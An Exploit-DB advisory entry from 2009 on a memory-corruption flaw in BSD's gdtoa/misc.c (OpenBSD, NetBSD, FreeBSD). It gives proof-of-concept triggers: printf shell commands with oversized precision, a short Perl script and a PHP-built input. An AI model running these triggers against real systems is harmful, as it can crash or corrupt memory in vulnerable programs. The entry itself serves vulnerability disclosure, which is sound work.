BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption

EDB-ID:

33058




Platform:

Multiple

Date:

2009-05-26


source: https://www.securityfocus.com/bid/35510/info

Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.

Attackers may exploit this issue to execute arbitrary code within the context of affected applications.

The following are vulnerable:

OpenBSD 4.5
NetBSD 5.0
FreeBSD 6.4 and 7.2

Other software based on the BSD code base may also be affected. 

The following proof-of-concept shell commands are available:

printf %1.262159f 1.1
printf %11.2109999999f
printf %11.2009999999f
printf %11.2009999999f

The following proof-of-concept Perl script is available:

#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;

The following proof-of-concept J program is available:

cxib=0.<?php echo str_repeat("1",296450); ?>